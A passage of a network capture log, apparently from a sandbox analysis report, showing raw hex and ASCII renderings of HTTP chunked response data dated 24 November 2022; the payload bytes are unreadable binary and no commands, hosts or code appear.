                    2022-11-24 19:13:26 UTC296INData Raw: f7 10 52 42 cd 3d
                    Data Ascii: RB=
                    2022-11-24 19:13:26 UTC296INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC296INData Raw: 32 30 30 30 0d 0a a5 b7 0c 25 21 19 0a f1 6c 17 4d d8 d8 5f 36 a7 0c f3 50 8f b8 ae 2c b0 19 bb 78 69 a6 9a d2 28 de 2e c7 f7 8e 45 f2 4d 73 63 19 32 d9 4a cb fb e3 83 2d 04 90 f0 53 1a 80 ed 2c f5 d4 98 2e 29 61 62 4d b9 84 f6 b5 34 dd 72 98 0d 25 b7 bd 1a 41 b3 86 cd 2d 9f 1f 65 ca 28 55 ee 1b 01 86 3a 48 8e 4b 0a 77 50 d8 e2 98 04 c6 f0 0e 75 c9 46 6f 18 a0 1c 53 94 f8 3c 12 28 b5 92 35 39 bd 88 42 e5 82 93 a5 3e 83 e6 42 3d 57 0d 66 d3 23 74 ff 53 2a fc e5 cf 7d 4e 71 5e 92 d7 19 3a ea d7 12 61 0d 1d db 4a 9f 64 fc 9a 97 5b ce 3c b3 4b be ea 77 0b 3a b9 70 75 54 59 d7 89 17 f6 40 b0 25 ac 69 cb 59 d0 95 b6 f1 7f 8d c1 4b d6 e8 92 2f 7e 14 77 11 8e b4 c1 17 12 3a f4 09 05 65 aa f9 03 7d de 56 37 99 a6 10 b2 3b 10 7c 3a 71 be 99 b3 e7 a3 25 b1 af b0 d5
                    Data Ascii: 2000%!lM_6P,xi(.EMsc2J-S,.)abM4r%A-e(U:HKwPuFoS<(59B>B=Wf#tS*}Nq^:aJd[<Kw:puTY@%iYK/~w:e}V7;|:q%
                    2022-11-24 19:13:26 UTC304INData Raw: 1d a3 f8 90 da aa
                    Data Ascii:
                    2022-11-24 19:13:26 UTC304INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC304INData Raw: 32 30 30 30 0d 0a fe d3 72 a7 f6 dc 84 4b 56 db d8 b3 e5 89 01 39 06 02 a5 7f f3 f4 46 cb 0e f8 fc d3 a5 2b 31 67 85 02 1b 6f bb 0e 25 60 35 bf 7e 17 d6 79 72 da 2f c0 e5 2d ea ab ea 1f 6e 56 5b ab 94 ed 61 df c3 88 8f fe 8f 5a 55 66 3d f9 ef bb 3f b9 1a c7 55 66 16 4b ff fe 7d 37 c4 78 e1 c7 1e 33 73 f9 77 56 27 dc c5 08 c9 ab 62 7d 65 cd 3b 5b b8 08 7d 42 ef 3a b8 25 0d 1f b3 b5 33 c9 b2 fe 38 56 f8 d6 c3 4d 4c fe c9 5e f5 b9 1a d0 f9 4f 73 f3 8d e4 e1 4c 9c f1 65 26 c0 3f d5 61 30 1a aa 3f e0 f8 d1 96 b8 35 32 15 b1 ef a2 b3 e9 7a 6f d7 27 cf 3e 7a 52 ad 6c 95 1d ea 82 34 59 20 16 41 e0 b8 05 25 5c cb fa fb 47 1f be 11 35 00 6e 0e 8a 44 cb bd 9a 26 86 66 d2 5c f1 96 b8 89 9a 68 65 a8 a0 41 f4 22 ed da 1f f5 56 a8 e6 a4 c1 b9 cf 71 69 64 b9 cb 56 9d 6b
                    Data Ascii: 2000rKV9F+1go%`5~yr/-nV[aZUf=?UfK}7x3swV'b}e;[}B:%38VML^OsLe&?a0?52zo'>zRl4Y A%\G5nD&f\heA"VqidVk
                    2022-11-24 19:13:26 UTC312INData Raw: cc 40 45 b3 61 d0
                    Data Ascii: @Ea
                    2022-11-24 19:13:26 UTC312INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC312INData Raw: 31 66 66 38 0d 0a c7 a5 70 3f 86 1f 70 22 8a 7d 34 05 9e a9 58 f9 1c fa 26 aa 5c 56 8c d7 b8 1c cb 7e 1e 90 fd 29 d0 73 b4 f2 30 49 95 21 d3 3e e3 e5 34 ad 9e fa e9 bc 20 7b 25 53 d5 5e e1 66 d9 b1 d8 87 fe 6d 63 77 e8 fa 60 17 50 a5 5c 77 c9 c8 49 06 04 93 47 0c 7c 60 c2 72 e5 50 99 77 50 0e 1c 9c ea 00 c5 da 75 19 94 75 32 e4 3a e8 d7 cc 20 58 0a 3b ad e9 21 20 17 5a 9c 71 c4 6b a0 b4 e1 1a 9b c6 c6 9c c2 3e e3 2a e1 19 4f be 57 3e eb 6a 84 3a ca 5a fb 2e aa 7e ca 71 5f a5 77 7d 04 57 bc 79 49 ef 1e 96 92 1e 1c c1 a7 b5 45 84 6c de d0 75 56 39 9d 4b 7f ae 69 82 8f 4d fd 1b 29 e0 eb ed c0 77 3b f5 8a 80 98 be d4 bf 85 a4 d8 75 60 b7 72 9c 4d 13 0e 1c 16 c4 4b c0 11 1e 7c c7 9b c5 73 26 0e d4 76 6a 5f 76 35 64 33 b6 7b a7 60 1b 0a 46 9e 9e 9d 38 45 e1 28
                    Data Ascii: 1ff8p?p"}4X&\V~)s0I!>4 {%S^fmcw`P\wIG|`rPwPuu2: X;! Zqk>*OW>j:Z.~q_w}WyIEluV9KiM)w;u`rMK|s&vj_v5d3{`F8E(
                    2022-11-24 19:13:26 UTC320INData Raw: 32 30 30 30 0d 0a
                    Data Ascii: 2000
                    2022-11-24 19:13:26 UTC320INData Raw: 52 09 07 b2 d7 85 78 8b a8 fd f5 ae d8 3a 42 3b df 5e 80 b0 47 00 ff 6e fe 4a c9 3a ea 85 7d 7f 09 49 bf 1f 9b f0 19 ae 3c 0e 24 2f 46 4f fa b5 e7 8d 58 e3 4d 99 71 76 3b 42 c0 05 49 cb 90 ba b4 5f 96 b2 0b dd 7a 1e 39 ef 8c 87 82 d4 4b a5 c8 d8 12 83 f0 13 64 9d ae 85 d4 41 92 46 c8 1f d8 e2 e3 54 7e 3a ed b1 c9 4f 15 a5 9f 86 b5 b5 f2 fc 34 84 ac 8e 41 36 55 da 99 85 a5 df b9 9f 13 15 0f 0a 6b db 3a 43 b5 0b 39 b5 99 56 f7 3d 69 0b 99 d0 88 49 54 19 7c ae cc 9d 5d 5d 8a 6d b2 bc 88 2d f4 3d 98 9a a2 82 09 16 54 8f 33 a1 4e 86 50 13 51 e0 00 58 bd 88 2a 20 0b fa a9 dd cf 2a e4 c1 97 49 5d 43 dd c5 34 9a d5 df 34 5e 8a b5 56 7d 0c d6 8c a9 78 ba 20 4c 68 0c 74 5e 88 36 98 14 8e 57 7d d6 5d 79 49 11 2d 48 5c be 68 ee aa 7f 9e 91 4c 3e fc cb d9 f3 b3 fb d6
                    Data Ascii: Rx:B;^GnJ:}I<$/FOXMqv;BI_z9KdAFT~:O4A6Uk:C9V=iIT|]]m-=T3NPQX* *I]C44^V}x Lht^6W}]yI-H\hL>
                    2022-11-24 19:13:26 UTC328INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC328INData Raw: 32 30 30 30 0d 0a 0d 57 50 1f e2 88 a9 d0 d0 be f3 20 1b 64 9c f8 88 f6 59 9c 5a c1 80 be ca d7 4b cb 03 f0 b1 60 66 f4 55 a4 cb 82 85 5d f4 68 7d 6c 7d f6 15 45 70 5a 78 40 3c a4 11 89 ee 05 c7 ce 16 5b 91 7b 98 f6 10 7a 31 3f 01 fa c0 85 97 79 dd 3f 14 b2 27 e8 34 ae 77 63 52 c7 70 e1 9a 2a d2 7e 84 5a 74 cc 0a f7 78 dc 91 38 96 8e 48 df 7f a4 02 55 22 55 3f da fa af fc 26 09 98 4f a1 82 b3 c5 60 21 03 3f 35 ca 3b e9 f6 38 c1 77 29 4f 8e cc b3 f4 6b c6 7e 37 bd 42 c0 a3 43 c1 47 be 33 b0 7a c4 26 df 73 b9 18 1c bb db 40 bf c9 fb 32 86 36 c3 59 2b 03 76 be 9f 03 0e f7 46 da 00 4a f9 68 6e 8e d3 ed 64 8a d3 50 df ff f9 8b 7a 40 17 3a d8 b3 71 c5 9d fe db 13 3e d0 c0 74 f6 cd ea 4f 53 7c bc e6 5f a2 1d 98 14 8c 71 95 99 82 9e 3e d1 61 02 7b fd 38 50 63 c5
                    Data Ascii: 2000WP dYZK`fU]h}l}EpZx@<[{z1?y?'4wcRp*~Ztx8HU"U?&O`!?5;8w)Ok~7BCG3z&s@26Y+vFJhndPz@:q>tOS|_q>a{8Pc
                    2022-11-24 19:13:26 UTC336INData Raw: 0a 26 f5 5f b3 89
                    Data Ascii: &_
                    2022-11-24 19:13:26 UTC336INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC336INData Raw: 32 30 30 30 0d 0a ee 7d e6 d7 37 d7 e5 9c 39 b6 af b4 22 02 b5 b6 3d 5b 21 be 99 8a 7f e3 0c 39 fa 96 07 4e 08 fe 74 36 d8 7a 63 ef 8b 98 b3 dc 68 f9 66 da 9b 11 07 06 db 13 d3 7f 38 83 d2 af bd 72 6a 7c 40 ea 3b 00 f0 2d 06 a5 35 6a 06 5a ea 10 9d ae cb a8 07 af 29 61 06 d0 0f 52 c2 77 6e 19 5d f7 e0 f6 7f 85 54 fb f5 40 c3 99 c5 f0 6b 81 ff 53 a6 43 f5 bd 61 61 a9 cb 44 86 4b 7c 1e 2d 62 02 92 0a f4 6c 5e 49 d3 1a 5b 7b 1f 89 70 68 b1 d7 bb c5 94 e6 07 56 28 06 b0 92 5a 0f 7f 90 a6 b4 ff ff b7 a4 cc 86 cb d9 bc e1 53 e5 7d c9 64 8a 33 15 11 65 d7 89 a4 32 92 12 8b bd 08 3c 60 65 0e 68 73 e1 58 a6 44 bb d8 95 3a e6 80 93 83 57 af 39 dd 25 c5 df ed d5 f9 54 2c 9f 52 76 0c 5e 3d c2 cb 43 79 be 54 2b 67 c8 17 23 94 01 06 be cc 64 c7 e1 c9 f7 d8 7e 6a ff 50
                    Data Ascii: 2000}79"=[!9Nt6zchf8rj|@;-5jZ)aRwn]T@kSCaaDK|-bl^I[{phV(ZS}d3e2<`ehsXD:W9%T,Rv^=CyT+g#d~jP
                    2022-11-24 19:13:26 UTC344INData Raw: e2 dd ef ce 7d 4e
                    Data Ascii: }N
                    2022-11-24 19:13:26 UTC344INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC344INData Raw: 32 30 30 30 0d 0a f7 8f 46 f6 26 78 4d 14 c1 43 72 0e 6e 86 4e ff 66 99 a5 fd c1 e0 2c aa 75 ad d1 ab d2 a6 ad e7 61 9d a4 ea d5 12 ad 1f 7b 4d bf d0 da 01 b0 45 21 0e 19 44 81 09 51 61 b4 db 65 63 d5 8f c6 81 2b 81 95 0f 26 75 b5 a4 a1 cf 6c 04 2e bb b0 d0 a2 e3 f4 57 9c 43 cc 9c 90 16 9a 7b cf 52 64 67 ee e6 96 46 47 70 0f 69 46 cf b9 0f 03 f8 82 38 91 7d 45 8a 80 89 78 f2 8b 3a 36 98 dc 65 38 19 8a 17 ad 1e ae fc ad 28 88 e2 e5 61 bb 41 09 1d 90 7c 58 20 f8 c7 dc e2 f2 2c 7e 3c da c1 02 99 c9 58 2a 4c 78 16 fb 7b f7 23 ee 87 1f 21 46 3c 63 fc 34 6c b5 97 37 6e 12 33 9b f8 bf 2a 58 ad 9e 55 a1 32 f6 cc ca 9d 6e a3 67 e9 44 ee 08 72 d9 41 c0 7b b7 d9 56 b5 56 69 6c 13 1d 02 5a 4d 14 19 1e a0 15 ac 88 e7 25 6e 7b 42 c7 06 2c 7d 37 20 91 cf 39 e4 5a c5 97
                    Data Ascii: 2000F&xMCrnNf,ua{ME!DQaec+&ul.WC{RdgFGpiF8}Ex:6e8(aA|X ,~<X*Lx{#!F<c4l7n3*XU2ngDrA{VVilZM%n{B,}7 9Z
                    2022-11-24 19:13:26 UTC352INData Raw: 57 57 01 f7 c3 a1
                    Data Ascii: WW
                    2022-11-24 19:13:26 UTC352INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC352INData Raw: 32 30 30 30 0d 0a 02 be 4d dc da 4a 41 32 fc 0f 4c 05 22 29 6e 5d 5a 27 92 40 36 16 ae 06 25 b8 3f 41 48 3e 69 6e 28 0c 5e ca 07 02 92 f7 19 d4 b9 30 cb 5c 6f 8d ef 7f f0 7e fd 67 f7 c2 b3 83 7e c1 07 e6 f5 da 4c e0 49 0c 5e 3a 59 17 ba 8a 5d 00 ab 91 49 75 9b c6 b2 9d 03 64 05 d7 27 d8 2f 3f f1 c7 e2 2d 24 c9 2e 9a d0 e5 dd 79 db 1c b3 fa 5b ff ff 10 74 85 6c 11 a3 cd ca 90 00 78 25 2f 7d 36 c5 a2 7a 25 8e 15 6f d9 b0 02 4b 53 14 55 14 49 66 6a dd 7c 0e 9d df 30 41 c7 d7 f5 64 82 5d e6 bc 21 a1 dc 4c 57 f8 44 77 b1 85 f3 14 b0 2e 6b bc 8e 59 b0 2e fd 9f e5 56 5a ca 8c d4 63 93 df 40 75 61 e3 90 d0 57 d1 cb 6c 67 46 87 62 19 01 83 77 97 af a4 a4 4d ca 37 d3 df 84 56 6c ea c4 1d a4 8e ea 3e 3f 6f 93 a5 12 34 bc d7 22 70 17 99 f8 a5 42 da b9 79 58 2b d8 b9
                    Data Ascii: 2000MJA2L")n]Z'@6%?AH>in(^0\o~g~LI^:Y]Iud'/?-$.y[tlx%/}6z%oKSUIfj|0Ad]!LWDw.kY.VZc@uaWlgFbwM7Vl>?o4"pByX+
                    2022-11-24 19:13:26 UTC360INData Raw: 5f cc 36 d1 17 0a
                    Data Ascii: _6
                    2022-11-24 19:13:26 UTC360INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC360INData Raw: 32 30 30 30 0d 0a d7 5f 24 2f 84 c3 43 d4 b5 6d ab ca d5 c1 cf b5 61 17 3d 17 6a d3 ab 9e 28 2e 79 b8 5d dd a4 40 e1 8a 85 6e 4e 82 14 05 77 52 5f 77 c1 ab 58 a1 70 fd 44 53 93 9f 78 68 df e0 44 be df 3d 5f a8 58 24 48 6a ae fd 72 a2 04 ed cb 5e be 43 bd bf b2 ca 7f 44 45 03 33 17 29 13 53 db 78 3a 4a 5d 0d ec 2e 7c a3 23 3c fe b6 e7 85 81 7c 93 7a cc d6 4a 6a 4a b0 02 38 bc d3 7e f7 c5 a3 e9 ec 64 97 39 cf 17 a5 53 84 fa 88 0c e8 79 ef 7f 68 77 d3 44 04 c8 06 36 bb f5 3b c3 e1 b1 96 35 07 20 8d 68 d7 03 60 ad 0a 3e 0e 7a 97 b0 0d f7 b7 91 76 95 bc 9b 0e a7 bf f8 9b 43 93 24 1f 20 87 b3 f3 0d e9 92 e7 5f 0f 86 9b 57 fd b9 22 e4 03 0f b7 b3 ae 28 04 7f 5e ba bd cb ca f4 3b 2c 25 9f 8e 7f 25 55 52 f4 a2 31 ab da 78 4b 95 65 5a 42 a7 63 a5 15 61 aa 18 36 94
                    Data Ascii: 2000_$/Cma=j(.y]@nNwR_wXpDSxhD=_X$Hjr^CDE3)Sx:J].|#<|zJjJ8~d9SyhwD6;5 h`>zvC$ _W"(^;,%%UR1xKeZBca6
                    2022-11-24 19:13:26 UTC368INData Raw: a7 8e 81 fc 15 cb
                    Data Ascii:
                    2022-11-24 19:13:26 UTC368INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC368INData Raw: 32 30 30 30 0d 0a af 34 aa 37 b8 95 f7 f8 51 c0 f6 00 1f 7d 70 36 a4 78 5b 15 70 56 42 d4 14 d0 44 7f f9 d3 72 81 9b 6a 24 43 0b ae f6 ae e6 38 f2 dc b9 df 96 0d 63 74 ff 85 6b 88 94 8d 7c 03 f8 5c 5f a7 9a 3f 5f b6 46 29 69 60 5e c1 3c 6a 4a 36 fa ca 4d dc fe 96 d3 43 54 0c fc 5c 22 f1 00 7e d9 38 90 9c c5 92 4d 74 98 f8 1d 66 b5 e9 b7 84 9f a6 25 bc 9a 19 ef c7 07 d8 7d 9c 1b 69 2a 14 2c 73 a9 91 63 a7 b9 bb e3 35 b9 b0 e8 d2 12 20 b3 44 07 3d e6 6a b6 55 6b 3e d4 50 57 fd dc f5 6a ee e7 b3 f6 ef 0e 36 4c 00 41 55 e4 d3 77 81 ae 00 f0 1c 98 6a e0 73 78 d3 4b 58 d5 1e 2f db 0c 57 eb 63 1b 40 a0 05 aa aa ba f1 db ae 3f f0 e4 10 b9 dc d1 5a 8a d0 cf 8d 3b 8a 13 47 e9 2e 91 28 30 5c 2b 96 16 cb 39 57 b8 16 73 e9 8c 44 b3 4f a2 e2 78 f5 8f 63 cb f8 54 0b 95
                    Data Ascii: 200047Q}p6x[pVBDrj$C8ctk|\_?_F)i`^<jJ6MCT\"~8Mtf%}i*,sc5 D=jUk>PWj6LAUwjsxKX/Wc@?Z;G.(0\+9WsDOxcT
                    2022-11-24 19:13:26 UTC376INData Raw: b0 ca 07 21 0f 01
                    Data Ascii: !
                    2022-11-24 19:13:26 UTC376INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC376INData Raw: 31 66 66 38 0d 0a 0c 63 00 2b 06 ea 01 48 90 33 4a 34 a7 57 4b c7 55 8f ba 4f c1 d4 12 32 e1 8e 21 ee f3 e7 3c 29 45 d1 fd 25 78 55 96 09 63 c2 3a 06 ad 73 ca 3f 64 c4 4f 41 30 27 df 20 4a 79 34 2b 9d 89 ad f8 87 f5 9e dd ef ef 2d 3c a8 c8 13 77 25 82 79 0d f8 72 48 51 38 fe 2c 43 61 bf 8c 26 14 f9 c9 92 81 2f e1 8a 55 a6 99 b6 5e cd de 84 d2 88 f8 7d 43 d7 5d 54 63 65 b4 e3 7a 95 00 eb fa e6 5e ab 57 f7 7b 6f d5 fc 38 ec ae c0 11 be 72 a6 c3 9b dd 54 02 76 56 54 af 96 09 6b eb 48 37 67 5e 34 f4 0a 7a 7b 08 25 f6 d1 9b b9 92 48 11 82 0a 21 b2 b9 e9 f0 69 02 a8 bb 40 04 0c 61 0b 7c bc 2b 75 c9 3f 09 8e 97 e2 2b 47 9e 76 97 89 88 4e 82 05 dc bf 84 7c 0d 0c c3 bf ce 16 d5 34 aa 05 7c 8d ad 7f 88 6e e0 72 d4 72 3c 27 9f 59 2a 9d bb d9 6a fb 8c 20 22 f1 9d 96
                    Data Ascii: 1ff8c+H3J4WKUO2!<)E%xUc:s?dOA0' Jy4+-<w%yrHQ8,Ca&/U^}C]Tcez^W{o8rTvVTkH7g^4z{%H!i@a|+u?+GvN|4|nrr<'Y*j "
                    2022-11-24 19:13:26 UTC384INData Raw: 32 30 30 30 0d 0a
                    Data Ascii: 2000
                    2022-11-24 19:13:26 UTC384INData Raw: c2 7d 42 3f f3 ad db e8 b1 7a 02 53 51 a3 f4 5b 4b a7 6e ef ee c9 d3 b2 37 ab 56 20 c6 f1 ff a6 ca 29 8a 12 be 7c 2f 5f 6c 73 10 53 7b 25 18 e4 a6 06 44 d6 5d 8e 5f 29 d8 94 fa e1 96 92 df 30 7c c4 74 28 d9 f1 45 74 00 b1 1f 26 9b 8f 56 23 bf c0 b4 f5 f4 62 67 ca e1 22 8d f3 bb 3f 25 80 36 3c 22 bb 22 c8 c3 79 72 6b 1a 3a 36 94 49 f8 a9 7e 56 20 06 57 57 01 1c 24 72 2c f8 7f ee ec 6c 9c 67 96 93 0a 11 d2 e3 b0 8b 5c ba ac 99 d9 a3 4f d2 a8 59 a3 e1 42 3b cc 54 83 af 3e bd d7 df ea ec 08 20 27 40 eb f0 17 22 7e 45 d6 8d 0f 4f f3 11 85 d2 26 51 2d 7e 03 9b b7 fe 21 46 d4 05 7c b9 36 6c f6 a7 e4 be 8d 29 24 f9 a1 e4 be 0d 0e cc dc 1e 46 b5 5c 79 35 60 86 65 19 99 3e d7 9b 07 76 6e fd 03 09 06 f7 7e 91 e4 05 91 de b9 05 75 e9 d3 f2 4a 00 92 09 d5 2f 38 39 c5
                    Data Ascii: }B?zSQ[Kn7V )|/_lsS{%D]_)0|t(Et&V#bg"?%6<""yrk:6I~V WW$r,lg\OYB;T> '@"~EO&Q-~!F|6l)$F\y5`e>vn~uJ/89
                    2022-11-24 19:13:26 UTC392INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC392INData Raw: 32 30 30 30 0d 0a 62 42 af 2d fc 55 16 89 2e 8a 66 9f 8c 9e 7c bd 71 96 cb bd 5f 0a ff 16 aa ab 93 02 a0 d7 4a 8f 78 d2 df 7d 23 97 58 99 7d b6 09 4e 44 8d db c1 48 69 6d 34 18 8e 63 f4 c9 7a 58 74 aa 5e fc 13 1d 74 f0 1c dd 83 20 0e b2 91 c3 3e e1 80 30 65 4e e0 a8 67 ed bd 3b f0 b3 b4 8b a7 9a 90 31 65 2b 17 4d cf 4b 3e f5 a4 eb cb 4e 1b 53 d8 5f 52 45 b5 2f 23 1a d8 d5 34 6a 89 da f8 36 2c 5b 70 ae 95 12 23 29 7c 1f a8 30 a4 ff 57 0d 63 34 fa f6 6b ac 13 37 45 69 fd 1a b9 02 32 8b d2 41 a5 46 b8 c8 9d a0 cc aa 45 0d b8 2f 7d 06 fb f9 c6 30 1c d3 d6 43 36 7a f9 d7 63 65 42 0d fb 50 b8 f7 41 0e 70 7c 07 1d 00 31 d7 eb a8 1c d4 71 7b 63 e6 f4 04 b7 f7 b2 09 0c f3 ea 53 fa df a3 e4 52 85 2a 09 89 97 90 5d 02 f7 b0 aa 1c 36 5e a0 04 82 5b 0c 79 b1 5b e3 42
                    Data Ascii: 2000bB-U.f|q_Jx}#X}NDHim4czXt^t >0eNg;1e+MK>NS_RE/#4j6,[p#)|0Wc4k7Ei2AFE/}0C6zceBPAp|1q{cSR*]6^[y[B
                    2022-11-24 19:13:26 UTC400INData Raw: 48 cd b8 e4 79 82
                    Data Ascii: Hy
                    2022-11-24 19:13:26 UTC400INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC400INData Raw: 32 30 30 30 0d 0a 63 49 1d cc a7 74 f7 b9 49 dc 97 53 ab 93 23 3d d2 3c 41 54 75 f3 4f e8 e2 ed 38 24 ab 32 3c ef a3 d4 1f 4c bb 91 eb 14 a2 78 ca e9 e2 53 8b 2c ec 59 a4 ac 09 3c b5 92 a2 77 7f c1 88 ec f1 24 86 70 fa 8f 50 08 0c 98 8d 2f 5d f5 14 47 0d 23 18 f4 ec 40 ee 48 21 98 3f ba 1f 1b a8 77 68 27 17 42 a3 bd a1 b3 fb 04 01 99 fa 4b 01 3f a0 b4 fb c0 b4 21 3c 74 35 25 cf 6b f4 ef a1 bb 69 44 1b 0f cf 5d 74 6d 23 b4 b1 f0 f5 b3 e4 87 0a f8 f6 1d 09 c2 ed f6 85 93 06 cf 23 88 03 b6 fd 3c 20 67 17 68 eb d8 2d 53 8b 87 0c dc 11 ee 83 3a cc ea ab 53 ef 05 52 62 7a ec b7 50 fe 01 cb ae 35 6e a1 30 ab 11 96 64 b9 14 61 29 ba 75 09 f3 ec f2 88 82 50 fe 78 34 9f 7d d7 49 00 40 de aa 79 e0 05 a8 87 e2 6b 82 62 1e 19 33 8d 3a b2 e8 09 22 d2 76 a3 80 3d b4 4b
                    Data Ascii: 2000cItIS#=<ATuO8$2<LxS,Y<w$pP/]G#@H!?wh'BK?!<t5%kiD]tm##< gh-S:SRbzP5n0da)uPx4}I@ykb3:"v=K
                    2022-11-24 19:13:26 UTC408INData Raw: e8 48 4b 13 f1 70
                    Data Ascii: HKp
                    2022-11-24 19:13:26 UTC408INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC408INData Raw: 32 30 30 30 0d 0a 2e ab 99 c1 c2 6d 85 f7 74 39 4e 67 ec 32 0b 28 bc a3 f9 2d a2 22 aa 78 dd 50 4b cb 95 1f 22 e7 f0 e1 f4 4f 96 01 ac fd db 47 5c 56 76 06 39 2e 21 90 77 bc d1 a8 cc 7a 50 fb 5b 43 c9 45 b9 9b 68 76 7c 63 53 ab b7 96 0f b5 5d 36 55 c4 ca 00 91 b8 5d 3c ae 87 5f 5f a3 10 14 23 ca e2 58 20 2e 8a 07 c3 16 04 bb 7c e8 8b 73 2a c6 56 40 17 53 19 7d bd e2 af da ba fc a3 43 05 13 43 d0 e0 4a 27 7a f3 42 a6 78 6a 71 1e 23 7b c6 aa 84 94 8d d2 e8 d3 dc f7 09 5e 41 3b a8 bb e9 d8 c2 78 01 d8 75 ab 77 5c 06 1f 76 33 9e 70 e9 13 4d df 4f 7f 93 ee 78 21 25 bb 9a c7 e4 67 b0 27 11 34 fe 1d ea aa 87 43 2f 6f 37 30 6b 83 38 07 a5 33 4e c1 e0 61 90 04 b9 5d 13 b0 67 35 d3 89 8b 45 25 6d 3f 96 4b eb ea ee 32 0a 18 32 ec 09 e6 ba 5d 9e 45 5e 52 f6 d1 cb 00
                    Data Ascii: 2000.mt9Ng2(-"xPK"OG\Vv9.!wzP[CEhv|cS]6U]<__#X .|s*V@S}CCJ'zBxjq#{^A;xuw\v3pMOx!%g'4C/o70k83Na]g5E%m?K22]E^R
                    2022-11-24 19:13:26 UTC416INData Raw: 7b ba 94 f0 b3 0f
                    Data Ascii: {
                    2022-11-24 19:13:26 UTC416INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC416INData Raw: 32 30 30 30 0d 0a b2 cf f0 74 84 ea 43 50 3d 27 8d a8 a2 a5 c1 70 f8 ad 6f 67 d1 35 cd 86 52 10 ee 72 de 5d 8b 18 5b 47 9f aa 91 ff 64 1a 76 99 60 b1 74 96 d8 60 de 6f 7a 5d ea 80 30 60 e0 0c b8 56 28 8f 16 26 e1 5e 2a c2 68 49 3d f6 31 ca f9 c9 4b f1 5a 22 c9 5a 23 8e 01 33 26 df 13 59 bf e5 55 3e 8d e1 8b 9a 04 e3 ec c4 3c e6 19 61 90 1e ff 6d a3 42 43 c1 ea ee 5b 33 47 31 66 bd c9 56 35 53 8c e1 e1 38 b8 1e df b7 d1 4b 4e a4 98 73 87 71 29 ae 25 02 b6 94 21 4a 0c 3c 5a a0 45 e6 57 3f db ca 22 bc b3 80 10 11 ad 19 24 11 29 0d 1b d1 9e e5 ec a8 3a ee 04 65 f9 9b 87 a3 a3 ca 64 cf c9 5b 5b 64 60 79 50 2d d4 47 e1 78 ac 4a 5b 8a 08 ee ef 3f f4 0b a4 34 e2 99 ba 9b db ba 2d 87 8f 85 ab 47 d3 6c 08 3a f4 ea 8b fe 79 12 ba af 44 65 f6 16 84 b4 d1 ef c8 bd 77
                    Data Ascii: 2000tCP='pog5Rr][Gdv`t`oz]0`V(&^*hI=1KZ"Z#3&YU><amBC[3G1fV5S8KNsq)%!J<ZEW?"$):ed[[d`yP-GxJ[?4-Gl:yDew
                    2022-11-24 19:13:26 UTC424INData Raw: e5 2c bb 02 a4 f9
                    Data Ascii: ,
                    2022-11-24 19:13:26 UTC424INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC424INData Raw: 32 30 30 30 0d 0a 8d aa 70 23 ed 22 08 9d 5c e2 45 dc 81 f6 69 0c 9b 14 89 1b 2e 8f 71 b4 03 17 d2 19 a7 bb 75 a4 d5 d2 33 97 10 59 9f b1 4c 2e cf 88 53 a5 85 a0 64 49 a3 36 88 21 bc 2f 52 3d f3 5c 68 6a 84 d5 3e 55 31 86 65 36 2d a0 66 de 66 21 74 a0 e7 31 5b f7 62 48 33 8b f4 fb a7 59 fe 3a 27 92 65 04 aa fe c5 70 de 58 e0 98 1e 20 c8 a5 50 3c c1 27 0e 24 34 cc d8 63 ba a0 b4 12 7f 8c b5 13 f9 c8 5b 1a b5 34 47 4e 71 94 cc c0 e8 ed 39 1a e9 e1 3d c5 37 db dd a4 7d d7 db 6e 81 91 fc 70 15 89 3e 72 5c 8c 84 7c 16 45 4f b9 fb 90 75 ac 57 77 62 f3 90 84 0d a6 29 39 0d 43 b9 a4 4b 6b 4e c1 0d d6 81 7e 94 fe 1b fc c8 d0 c2 be f1 2e a7 15 bf 5c 05 e6 64 55 b6 15 32 8f 47 37 f2 15 40 54 b3 72 20 a9 01 ee 00 f9 57 f2 e2 06 d9 3c fc 66 c5 4f 97 dc 0d e7 d7 26 35
                    Data Ascii: 2000p#"\Ei.qu3YL.SdI6!/R=\hj>U1e6-ff!t1[bH3Y:'epX P<'$4c[4GNq9=7}np>r\|EOuWwb)9CKkN~.\dU2G7@Tr W<fO&5
                    2022-11-24 19:13:26 UTC432INData Raw: 0e 2b 12 71 32 03
                    Data Ascii: +q2
                    2022-11-24 19:13:26 UTC432INData Raw: 0d 0a
                    Data Ascii:
                    2022-11-24 19:13:26 UTC432INData Raw: 32 30 30 30 0d 0a f1 34 9d cc 2d c7 3a fb 7b 5f 55 31 fb e2 19 9c 1b 5e 96 be 7b c8 e9 05 ba 64 99 43 9f 36 25 d9 e2 3c 84 81 29 dc a4 7e ce c5 99 78 57 4a 34 6c 95 e9 d6 ad 6e 37 e9 cd 44 49 81 f8 cc 20 8b 24 b4 76 7c a5 dc 4d fb 66 a4 9e 0e 0b 3f 62 64 d5 d2 a1 32 51 ef 0a 22 07 f9 b8 9c a4 3d b4 3c 72 66 6b be 07 fa b5 ed 2b 05 2b 72 9a 2e 13 f3 f2 65 f3 ff f2 39 23 69 7a ff 0b ce 46 cc 0a b4 d9 85 f4 7d a5 9c 38 37 22 b3 24 c8 35 38 78 34 8d 7b af 93 f5 77 2b 04 cd f3 5d 5a 81 16 14 ff db cd e3 19 03 1d 4b 91 91 1e 4d c6 fa 6e 95 fc 3f 5c 57 53 8f 3d d6 de 1f 16 33 b5 e2 6d e8 08 75 ab a8 35 aa 7d af 8a d9 1d d4 d9 60 3c c5 50 d3 44 da 66 15 be 0d f7 1b a5 81 65 c0 8a ff 06 d6 64 67 96 21 44 2b 31 7b 7c 2d 18 be b9 59 2d 05 ba 01 db 4c 48 b5 36 c6 